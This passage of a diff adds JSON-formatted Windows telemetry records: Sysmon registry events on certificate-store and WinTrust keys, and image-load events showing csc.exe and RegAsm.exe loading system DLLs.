"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\SysWOW64\\user32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860110000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\SysWOW64\\user32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "image_load", + "image_name": "psapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\psapi.dll", + "pid": 3592, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570860270000, + "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570862460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 